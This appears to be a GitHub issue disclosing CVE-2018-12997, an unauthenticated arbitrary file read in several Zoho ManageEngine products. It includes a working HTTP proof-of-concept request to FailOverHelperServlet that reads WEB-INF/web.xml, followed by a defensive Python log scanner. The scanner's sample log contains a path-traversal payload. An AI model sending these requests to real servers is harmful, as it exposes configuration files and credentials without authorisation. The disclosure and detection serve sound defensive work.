unh3x / just4cve


[CVE-2018-12997]Zoho manageengine Arbitrary File Read in multiple Products #8

Open unh3x opened 6 years ago

unh3x commented 6 years ago

=================
Zoho ManageEngine Arbitrary File Read in multiple Products

Date: 2018/06/20
Software Link: https://www.manageengine.com/products/firewall/download.html
Category: Web Application
Affected Products:

Netflow Analyzer
Network Configuration Manager
OpManager
Oputils
Opmanagerplus
firewall analyzer

Exploit Author: xiaotian.wang From DBAppSecurity
CVE: CVE-2018-12997

=================
Vulnerable cgi:

com.adventnet.me.opmanager.servlet.FailOverHelperServlet

=================
Proof of Concept:

POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfile&fileName=WEB-INF/web.xml HTTP/1.1
Host: 192.168.11.103:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

xx


Notice: This vulnerability can be reproduced without login.
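As an added defender-side example (not part of the original advisory or of the ManageEngine code), the following Python routine scans web-server access-log lines for copyfile requests to the FailOverHelperServlet named above and reports each requested fileName, marking those that contain directory traversal. The log lines, client addresses and every path other than WEB-INF/web.xml are constructed for this example, and the Apache/Tomcat combined-log format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined-log style). Addresses,
# timestamps and the traversal target are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jun/2018:10:01:02 +0000] "POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfile&fileName=WEB-INF/web.xml HTTP/1.1" 200 4123
10.0.0.5 - - [20/Jun/2018:10:01:09 +0000] "POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfile&fileName=..%2F..%2Fsome%2Fsensitive.conf HTTP/1.1" 200 812
10.0.0.9 - - [20/Jun/2018:10:02:00 +0000] "GET /apiclient/ember/index.jsp HTTP/1.1" 200 25611
10.0.0.7 - - [20/Jun/2018:10:03:00 +0000] "POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=status HTTP/1.1" 200 44
"""

# Combined-log request line: client, timestamp, method, target, status, size.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Servlet path from the advisory; the vulnerable operation is "copyfile".
VULN_SERVLET = "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"


def find_copyfile_requests(log_text):
    """Return one record per copyfile request to the vulnerable servlet."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != VULN_SERVLET:
            continue
        params = parse_qs(url.query)
        if params.get("operation", [""])[0].lower() != "copyfile":
            continue
        # parse_qs decodes once; a second unquote exposes double-encoded paths.
        filename = unquote(params.get("fileName", [""])[0])
        segments = filename.replace("\\", "/").split("/")
        hits.append({
            "src": m["src"],
            "ts": m["ts"],
            "fileName": filename,
            "status": int(m["status"]),
            "traversal": ".." in segments,
        })
    return hits


if __name__ == "__main__":
    for hit in find_copyfile_requests(SAMPLE_LOG):
        print(hit)
```

Any copyfile request to this servlet from an unauthenticated client is worth alerting on, whether or not the fileName contains traversal, since the advisory's own PoC reads WEB-INF/web.xml with a plain relative path.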